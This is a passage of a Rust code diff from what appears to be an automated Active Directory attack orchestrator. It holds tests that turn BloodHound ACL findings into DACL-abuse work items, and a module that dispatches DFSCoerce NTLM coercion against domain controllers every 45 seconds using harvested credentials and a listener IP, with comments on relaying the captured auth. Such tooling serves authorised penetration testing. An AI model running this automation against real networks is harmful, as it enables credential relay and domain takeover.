+ || vtype.contains("self_membership")
+ || vtype.contains("write_membership")
+ || vtype.contains("writeproperty")
+ || vtype.contains("allextendedrights")
+ || vtype.contains("addmember")
+ || vtype.contains("addself");
+ assert!(is_acl_vuln, "{t} should match as ACL vuln");
+ }
+ }
+
+ #[test]
+ fn non_acl_vuln_types_rejected() {
+ let negatives = [
+ "smb_signing_disabled",
+ "mssql_access",
+ "zerologon",
+ "esc1",
+ "kerberoast",
+ ];
+ for t in &negatives {
+ let vtype = t.to_lowercase();
+ let is_acl_vuln = vtype.contains("forcechangepassword")
+ || vtype.contains("genericwrite")
+ || vtype.contains("writedacl")
+ || vtype.contains("writeowner")
+ || vtype.contains("genericall")
+ || vtype.contains("self_membership")
+ || vtype.contains("write_membership");
+ assert!(!is_acl_vuln, "{t} should NOT match as ACL vuln");
+ }
+ }
+
+ #[test]
+ fn source_user_extraction_keys() {
+ // Verify the fallback chain for source user extraction
+ let details = serde_json::json!({
+ "source": "admin",
+ "source_user": "admin2",
+ "from": "admin3",
+ });
+ let source = details
+ .get("source")
+ .or_else(|| details.get("source_user"))
+ .or_else(|| details.get("from"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ assert_eq!(source, "admin");
+
+ // Fallback to source_user
+ let details2 = serde_json::json!({
+ "source_user": "admin2",
+ });
+ let source2 = details2
+ .get("source")
+ .or_else(|| details2.get("source_user"))
+ .or_else(|| details2.get("from"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ assert_eq!(source2, "admin2");
+
+ // No source returns empty
+ let details3 = serde_json::json!({});
+ let source3 = details3
+ .get("source")
+ .or_else(|| details3.get("source_user"))
+ .or_else(|| details3.get("from"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ assert_eq!(source3, "");
+ }
+
+ #[test]
+ fn source_domain_extraction_keys() {
+ let details = serde_json::json!({"source_domain": "contoso.local"});
+ let source_domain = details
+ .get("source_domain")
+ .or_else(|| details.get("domain"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ assert_eq!(source_domain, "contoso.local");
+
+ let details2 = serde_json::json!({"domain": "fabrikam.local"});
+ let source_domain2 = details2
+ .get("source_domain")
+ .or_else(|| details2.get("domain"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ assert_eq!(source_domain2, "fabrikam.local");
+
+ let details3 = serde_json::json!({});
+ let source_domain3 = details3
+ .get("source_domain")
+ .or_else(|| details3.get("domain"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ assert_eq!(source_domain3, "");
+ }
+
+ #[test]
+ fn target_user_extraction_keys() {
+ let details = serde_json::json!({"target": "victim", "target_user": "v2", "to": "v3"});
+ let target = details
+ .get("target")
+ .or_else(|| details.get("target_user"))
+ .or_else(|| details.get("to"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ assert_eq!(target, "victim");
+
+ let details2 = serde_json::json!({"target_user": "v2"});
+ let target2 = details2
+ .get("target")
+ .or_else(|| details2.get("target_user"))
+ .or_else(|| details2.get("to"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ assert_eq!(target2, "v2");
+
+ let details3 = serde_json::json!({"to": "v3"});
+ let target3 = details3
+ .get("target")
+ .or_else(|| details3.get("target_user"))
+ .or_else(|| details3.get("to"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ assert_eq!(target3, "v3");
+ }
+
+ #[test]
+ fn ghost_machine_targets_rejected() {
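+ // Auto-generated Windows machine names (`WIN-...$`) are treated as
+ // "ghost" machine accounts and rejected as DACL-abuse targets.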
+ assert!(is_ghost_machine_account("WIN-DPPJMLU3XS6$"));
+ }
+
+ #[test]
+ fn credential_matching_with_domain() {
+ let source_user = "admin";
+ let source_domain = "contoso.local";
+ let cred_username = "Admin";
+ let cred_domain = "CONTOSO.LOCAL";
+
+ let matches = cred_username.to_lowercase() == source_user.to_lowercase()
+ && (source_domain.is_empty()
+ || cred_domain.to_lowercase() == source_domain.to_lowercase());
+ assert!(matches);
+ }
+
+ #[test]
+ fn credential_matching_without_domain() {
+ let source_user = "admin";
+ let source_domain = "";
+ let cred_username = "admin";
+ let cred_domain = "contoso.local";
+
+ let matches = cred_username.to_lowercase() == source_user.to_lowercase()
+ && (source_domain.is_empty()
+ || cred_domain.to_lowercase() == source_domain.to_lowercase());
+ assert!(matches);
+ }
+
+ #[test]
+ fn credential_matching_wrong_user() {
+ let source_user = "admin";
+ let source_domain = "contoso.local";
+ let cred_username = "jdoe";
+ let cred_domain = "contoso.local";
+
+ let matches = cred_username.to_lowercase() == source_user.to_lowercase()
+ && (source_domain.is_empty()
+ || cred_domain.to_lowercase() == source_domain.to_lowercase());
+ assert!(!matches);
+ }
+
+ #[test]
+ fn credential_matching_wrong_domain() {
+ let source_user = "admin";
+ let source_domain = "contoso.local";
+ let cred_username = "admin";
+ let cred_domain = "fabrikam.local";
+
+ let matches = cred_username.to_lowercase() == source_user.to_lowercase()
+ && (source_domain.is_empty()
+ || cred_domain.to_lowercase() == source_domain.to_lowercase());
+ assert!(!matches);
+ }
+
+ #[test]
+ fn dacl_payload_structure() {
+ let payload = serde_json::json!({
+ "technique": "dacl_abuse",
+ "acl_type": "forcechangepassword",
+ "vuln_id": "vuln-acl-001",
+ "source_user": "admin",
+ "target_user": "victim",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": "admin",
+ "password": "P@ssw0rd!",
+ "domain": "contoso.local",
+ },
+ });
+ assert_eq!(payload["technique"], "dacl_abuse");
+ assert_eq!(payload["acl_type"], "forcechangepassword");
+ assert_eq!(payload["source_user"], "admin");
+ assert_eq!(payload["target_user"], "victim");
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn acl_vuln_type_case_insensitive() {
+ for t in [
+ "ForceChangePassword",
+ "FORCECHANGEPASSWORD",
+ "forcechangepassword",
+ ] {
+ let vtype = t.to_lowercase();
+ assert!(vtype.contains("forcechangepassword"), "{t} should match");
+ }
+ }
+
+ #[test]
+ fn source_user_from_key() {
+ let details = serde_json::json!({"from": "svc_account"});
+ let source = details
+ .get("source")
+ .or_else(|| details.get("source_user"))
+ .or_else(|| details.get("from"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ assert_eq!(source, "svc_account");
+ }
+
+ // -- collect_dacl_work integration tests --
+
+ use crate::orchestrator::state::SharedState;
+ use ares_core::models::{Credential, VulnerabilityInfo};
+ use std::collections::HashMap;
+
+ fn make_credential(username: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("cred-{username}"),
+ username: username.to_string(),
+ password: "P@ssw0rd!".to_string(), // pragma: allowlist secret
+ domain: domain.to_string(),
+ source: String::new(),
+ discovered_at: None,
+ is_admin: false,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_vuln(
+ vuln_id: &str,
+ vuln_type: &str,
+ details: HashMap<String, serde_json::Value>,
+ ) -> VulnerabilityInfo {
+ VulnerabilityInfo {
+ vuln_id: vuln_id.to_string(),
+ vuln_type: vuln_type.to_string(),
+ target: "192.168.58.10".to_string(),
+ discovered_by: "bloodhound".to_string(),
+ discovered_at: chrono::Utc::now(),
+ details,
+ recommended_agent: String::new(),
+ priority: 5,
+ }
+ }
+
+ fn acl_details(source: &str, target: &str, domain: &str) -> HashMap<String, serde_json::Value> {
+ let mut m = HashMap::new();
+ m.insert("source".to_string(), serde_json::json!(source));
+ m.insert("target".to_string(), serde_json::json!(target));
+ m.insert("source_domain".to_string(), serde_json::json!(domain));
+ m
+ }
+
+ #[tokio::test]
+ async fn collect_empty_state_no_work() {
+ let shared = SharedState::new("test".into());
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_no_credentials_no_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-001", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_forcechangepassword_produces_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-fcp-001", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].vuln_type, "forcechangepassword");
+ assert_eq!(work[0].source_user, "admin");
+ assert_eq!(work[0].target_user, "victim");
+ assert_eq!(work[0].domain, "contoso.local");
+ }
+
+ #[tokio::test]
+ async fn collect_genericwrite_produces_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("svc_sql", "contoso.local"));
+ let details = acl_details("svc_sql", "targetuser", "contoso.local");
+ let vuln = make_vuln("vuln-gw-001", "GenericWrite", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].vuln_type, "genericwrite");
+ }
+
+ #[tokio::test]
+ async fn collect_writedacl_produces_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("operator", "contoso.local"));
+ let details = acl_details("operator", "targetobj", "contoso.local");
+ let vuln = make_vuln("vuln-wd-001", "WriteDacl", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].vuln_type, "writedacl");
+ }
+
+ #[tokio::test]
+ async fn collect_writeowner_produces_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("operator", "contoso.local"));
+ let details = acl_details("operator", "targetobj", "contoso.local");
+ let vuln = make_vuln("vuln-wo-001", "WriteOwner", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].vuln_type, "writeowner");
+ }
+
+ #[tokio::test]
+ async fn collect_genericall_produces_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-ga-001", "GenericAll", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].vuln_type, "genericall");
+ }
+
+ #[tokio::test]
+ async fn collect_self_membership_produces_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("user1", "contoso.local"));
+ let details = acl_details("user1", "Domain Admins", "contoso.local");
+ let vuln = make_vuln("vuln-sm-001", "self_membership", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].vuln_type, "self_membership");
+ }
+
+ #[tokio::test]
+ async fn collect_sid_source_resolves_via_domain_admin() {
+ // BloodHound emits ACL edges where the source is a SID for a
+ // well-known group (e.g. Enterprise Admins ending in -519). The
+ // resolver should pick any DA-marked credential in the same domain.
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ let mut da = make_credential("admin", "contoso.local");
+ da.is_admin = true;
+ state.credentials.push(da);
+ state.domain_sids.insert(
+ "contoso.local".to_string(),
+ "S-1-5-21-111-222-333".to_string(),
+ );
+ let details = acl_details("S-1-5-21-111-222-333-519", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-sid-001", "GenericAll", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].vuln_type, "genericall");
+ // source_user must be the resolved cred's SAM, not the raw SID — the
+ // credential_resolver looks up password by `(username, domain)`, and
+ // a SID never matches a credential record.
+ assert_eq!(work[0].source_user, "admin");
+ }
+
+ #[tokio::test]
+ async fn collect_sid_source_non_privileged_rid_skipped() {
+ // Only well-known privileged RIDs are auto-resolved; an arbitrary
+ // user SID (RID >= 1000) requires an exact match.
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ let mut da = make_credential("admin", "contoso.local");
+ da.is_admin = true;
+ state.credentials.push(da);
+ state.domain_sids.insert(
+ "contoso.local".to_string(),
+ "S-1-5-21-111-222-333".to_string(),
+ );
+ let details = acl_details("S-1-5-21-111-222-333-1105", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-sid-002", "GenericAll", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_write_membership_produces_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("user1", "contoso.local"));
+ let details = acl_details("user1", "Domain Admins", "contoso.local");
+ let vuln = make_vuln("vuln-wm-001", "write_membership", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].vuln_type, "write_membership");
+ }
+
+ #[tokio::test]
+ async fn collect_non_acl_vuln_skipped() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+ let details = acl_details("admin", "dc01", "contoso.local");
+ let vuln = make_vuln("vuln-smb-001", "smb_signing_disabled", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_already_exploited_skipped() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-fcp-002", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ state
+ .exploited_vulnerabilities
+ .insert("vuln-fcp-002".to_string());
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_already_processed_dedup_skipped() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-fcp-003", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ state.mark_processed(DEDUP_DACL_ABUSE, "dacl:vuln-fcp-003".to_string());
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_source_user_empty_skipped() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+ let mut details = HashMap::new();
+ details.insert("target".to_string(), serde_json::json!("victim"));
+ let vuln = make_vuln("vuln-fcp-004", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_no_matching_credential_skipped() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("otheruser", "contoso.local"));
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-fcp-005", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_case_insensitive_credential_match() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("Admin", "CONTOSO.LOCAL"));
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-fcp-006", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].source_user, "admin");
+ }
+
+ #[tokio::test]
+ async fn collect_dc_ip_resolved_from_domain_controllers() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+ state
+ .domain_controllers
+ .insert("contoso.local".to_string(), "192.168.58.10".to_string());
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-fcp-007", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ }
+
+ #[tokio::test]
+ async fn collect_dc_ip_empty_when_no_dc_mapping() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-fcp-008", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dc_ip, "");
+ }
+
+ #[tokio::test]
+ async fn collect_credential_domain_mismatch_skipped() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "fabrikam.local"));
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-fcp-009", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_empty_source_domain_matches_any_cred_domain() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "fabrikam.local"));
+ let mut details = HashMap::new();
+ details.insert("source".to_string(), serde_json::json!("admin"));
+ details.insert("target".to_string(), serde_json::json!("victim"));
+ let vuln = make_vuln("vuln-fcp-010", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "fabrikam.local");
+ }
+
+ #[tokio::test]
+ async fn collect_multiple_vulns_produces_multiple_work_items() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+
+ for (i, vtype) in ["ForceChangePassword", "GenericAll", "WriteDacl"]
+ .iter()
+ .enumerate()
+ {
+ let details = acl_details("admin", &format!("target{i}"), "contoso.local");
+ let vuln = make_vuln(&format!("vuln-multi-{i}"), vtype, details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 3);
+ }
+
+ #[tokio::test]
+ async fn collect_dedup_key_format_matches() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-dk-001", "GenericAll", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "dacl:vuln-dk-001");
+ }
+
+ #[tokio::test]
+ async fn collect_source_user_fallback_to_from_key() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("svc_account", "contoso.local"));
+ let mut details = HashMap::new();
+ details.insert("from".to_string(), serde_json::json!("svc_account"));
+ details.insert("target".to_string(), serde_json::json!("victim"));
+ details.insert(
+ "source_domain".to_string(),
+ serde_json::json!("contoso.local"),
+ );
+ let vuln = make_vuln("vuln-from-001", "GenericWrite", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].source_user, "svc_account");
+ }
+
+ #[tokio::test]
+ async fn collect_target_user_fallback_to_target_user_key() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+ let mut details = HashMap::new();
+ details.insert("source".to_string(), serde_json::json!("admin"));
+ details.insert(
+ "target_user".to_string(),
+ serde_json::json!("fallback_target"),
+ );
+ details.insert(
+ "source_domain".to_string(),
+ serde_json::json!("contoso.local"),
+ );
+ let vuln = make_vuln("vuln-tu-001", "WriteDacl", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_user, "fallback_target");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/dfs_coercion.rs b/ares-cli/src/orchestrator/automation/dfs_coercion.rs
new file mode 100644
index 00000000..ad9bc889
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/dfs_coercion.rs
@@ -0,0 +1,450 @@
+//! auto_dfs_coercion -- trigger DFSCoerce (MS-DFSNM) NTLM coercion against DCs.
+//!
+//! DFSCoerce abuses the MS-DFSNM protocol (Distributed File System Namespace
+//! Management) to force a DC to authenticate to an attacker listener. Unlike
+//! PetitPotam, DFSCoerce requires valid domain credentials but works on
+//! systems where PetitPotam's unauthenticated path has been patched.
+//!
+//! The captured NTLM auth can be relayed to LDAP (shadow creds, RBCD) or
+//! ADCS web enrollment (ESC8).
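+//!
+//! Each dispatched task corresponds to what the public DFSCoerce PoC does when
+//! run as `dfscoerce.py -u <user> -p <pass> -d <domain> <listener> <dc_ip>`
+//! (invocation shape per the upstream tool, shown here for orientation only).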
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect DFS coercion work items from current state.
+///
+/// Pure logic extracted from `auto_dfs_coercion` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_dfs_coercion_work(state: &StateInner, listener: &str) -> Vec<DfsWork> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
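+ // Skip any DC whose IP equals our listener: coercing a host to
+ // authenticate to itself yields nothing relayable.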
+ if dc_ip.as_str() == listener {
+ continue;
+ }
+
+ let dedup_key = format!("dfs_coerce:{dc_ip}");
+ if state.is_processed(DEDUP_DFS_COERCION, &dedup_key) {
+ continue;
+ }
+
+ let cred = match state
+ .credentials
+ .iter()
+ .find(|c| c.domain.to_lowercase() == domain.to_lowercase())
+ .or_else(|| state.credentials.first())
+ {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(DfsWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ listener: listener.to_string(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Dispatches DFSCoerce against each DC that hasn't been DFS-coerced.
+/// Interval: 45s.
+pub async fn auto_dfs_coercion(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("dfs_coercion") {
+ continue;
+ }
+
+ let listener = match dispatcher.config.listener_ip.as_deref() {
+ Some(ip) => ip.to_string(),
+ None => continue,
+ };
+
+ let work: Vec<DfsWork> = {
+ let state = dispatcher.state.read().await;
+ collect_dfs_coercion_work(&state, &listener)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "dfs_coercion",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "listener_ip": item.listener,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("dfs_coercion");
+ match dispatcher
+ .throttled_submit("coercion", "coercion", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "DFSCoerce (MS-DFSNM) coercion dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_DFS_COERCION, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_DFS_COERCION, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(dc = %item.dc_ip, "DFSCoerce task deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch DFSCoerce");
+ }
+ }
+ }
+ }
+}
+
+struct DfsWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ listener: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::orchestrator::state::StateInner;
+ use ares_core::models::Credential;
+
+ fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("dfs_coerce:{}", "192.168.58.10");
+ assert_eq!(key, "dfs_coerce:192.168.58.10");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_DFS_COERCION, "dfs_coercion");
+ }
+
+ #[test]
+ fn skips_self_listener() {
+ let dc_ip = "192.168.58.50";
+ let listener = "192.168.58.50";
+ assert_eq!(dc_ip, listener, "DC IP matching listener should be skipped");
+
+ let dc_ip2 = "192.168.58.10";
+ assert_ne!(dc_ip2, listener, "Different IP should not be skipped");
+ }
+
+ #[test]
+ fn payload_structure_validation() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let payload = serde_json::json!({
+ "technique": "dfs_coercion",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "listener_ip": "192.168.58.50",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+
+ assert_eq!(payload["technique"], "dfs_coercion");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ assert_eq!(payload["listener_ip"], "192.168.58.50");
+ assert_eq!(payload["credential"]["username"], "admin");
+ assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "testuser".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
